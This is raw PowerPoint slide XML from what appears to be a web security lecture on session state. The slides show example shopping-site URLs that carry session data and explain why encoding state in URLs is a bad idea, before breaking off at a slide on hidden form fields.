              <a:t>authenticate and authorize user once, all subsequent requests tied to that user</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FBADF81-007B-5349-A6C3-6346AAAAD632}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2687466" y="5779303"/>
              <a:ext cx="2674800" cy="52200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBADF81-007B-5349-A6C3-6346AAAAD632}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2633826" y="5671663"/>
                <a:ext cx="2782440" cy="267840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26944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4152163A-7B57-204B-829F-CCD86ED171DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Primitive Browser Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0917C018-E3BF-A041-A687-FB5C32740FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1676400"/>
            <a:ext cx="2209800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="952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www.e_buy.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC6A733-65FB-7A4F-99C5-464739940244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3200400"/>
            <a:ext cx="0" cy="106680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8198" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856ACEEE-C078-1746-88D5-BF38E20722F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="4267200"/>
            <a:ext cx="2209800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="952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www.e_buy.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shopping.cfm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pID=269</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E57C8C0-6C14-1844-A86E-58F1B5A13854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1735138" y="3505200"/>
            <a:ext cx="1885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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>View catalog</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8200" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B11227-B273-7A46-9BA1-0FA8006A7449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="2438400"/>
            <a:ext cx="2057400" cy="220980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8201" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA6839D-B47E-B34D-8136-8C2E7A2EC9F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6861175" y="1676400"/>
            <a:ext cx="2209800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="952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www.e_buy.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shopping.cfm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pID=269&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>item1=102030405</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8202" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB35583-A975-504A-A329-77652D2E2232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7927975" y="3200400"/>
            <a:ext cx="0" cy="106680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8203" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F653E0A-F261-2149-82F0-94948E57C07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="4267200"/>
            <a:ext cx="2209800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="952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www.e_buy.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>checkout.cfm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pID=269&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>item1=102030405</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8204" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EB5EE06-D898-AF48-AF1A-225FD45E9A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7108826" y="3505200"/>
            <a:ext cx="1522413" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Check out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8205" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767BE65F-EBB3-A948-A44D-0F70437A91AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4715780" y="3505200"/>
            <a:ext cx="1585690" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Select item</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8206" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F53C94E-305D-784D-AB7C-31B0EEB0424D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8958265" y="3075055"/>
            <a:ext cx="31109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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Store session information in URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F37913-C7F9-4845-BC63-1F2F34854470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8843855" y="2538772"/>
            <a:ext cx="707760" cy="624600"/>
            <a:chOff x="8843855" y="2538772"/>
            <a:chExt cx="707760" cy="62460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BC2B2D1-3175-1B47-A5A2-B217CB2865D3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8843855" y="2614732"/>
                <a:ext cx="707760" cy="548640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2" name="Ink 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC2B2D1-3175-1B47-A5A2-B217CB2865D3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8826215" y="2597092"/>
                  <a:ext cx="74340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A994DD5-F3AB-C64F-AE90-45E6260D4B1C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8851775" y="2635612"/>
                <a:ext cx="41400" cy="165960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A994DD5-F3AB-C64F-AE90-45E6260D4B1C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8833775" y="2617612"/>
                  <a:ext cx="770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4B07D35-CF57-0E44-949A-A4AC218A8C1D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8878055" y="2538772"/>
                <a:ext cx="271440" cy="102600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B07D35-CF57-0E44-949A-A4AC218A8C1D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8860415" y="2520772"/>
                  <a:ext cx="307080" cy="138240"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100383DB-C667-B24B-9C85-1E08C6982262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4458335" y="4002892"/>
            <a:ext cx="6057000" cy="2225520"/>
            <a:chOff x="4458335" y="4002892"/>
            <a:chExt cx="6057000" cy="2225520"/>
          </a:xfrm>
        </p:grpSpPr>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040F6AE-C804-7342-8B1C-DA4F87C83823}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8804975" y="4002892"/>
                <a:ext cx="1112760" cy="1024560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D040F6AE-C804-7342-8B1C-DA4F87C83823}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8786975" y="3985252"/>
                  <a:ext cx="1148400" cy="106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E6137499-8D29-024C-9B3B-DB7E5FCF4761}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8826935" y="5008012"/>
                <a:ext cx="107280" cy="116280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6137499-8D29-024C-9B3B-DB7E5FCF4761}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8809295" y="4990372"/>
                  <a:ext cx="142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A562D7D-C567-8048-9D86-2F564656AC79}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4458335" y="4019452"/>
                <a:ext cx="6057000" cy="2208960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A562D7D-C567-8048-9D86-2F564656AC79}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4440335" y="4001452"/>
                  <a:ext cx="6092640" cy="224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59ECA3E-DC0B-AF49-BAC8-BD735D5B74A2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4473815" y="5212852"/>
                <a:ext cx="248760" cy="117000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="11" name="Ink 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59ECA3E-DC0B-AF49-BAC8-BD735D5B74A2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4455815" y="5194852"/>
                  <a:ext cx="284400" cy="152640"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337651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77" name="Rectangle 76">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9219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3036B32D-1AEC-C84B-B99C-85193317FEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad Idea: Encoding State in URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FAB92CB-465D-4149-B250-692D3B32CC47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478124" y="559477"/>
            <a:ext cx="5647076" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Unstable, frequently changing URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Vulnerable to eavesdropping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>No guarantee that URL is private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Some browsers (Opera) send entire URL history to third parties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57185645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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C34EE1-87CA-124E-9A1D-C6A847197F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Storing State in Hidden Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269F414D-ED9F-A44F-9CD2-FFC02650D115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854200" y="1951622"/>
            <a:ext cx="8402504" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
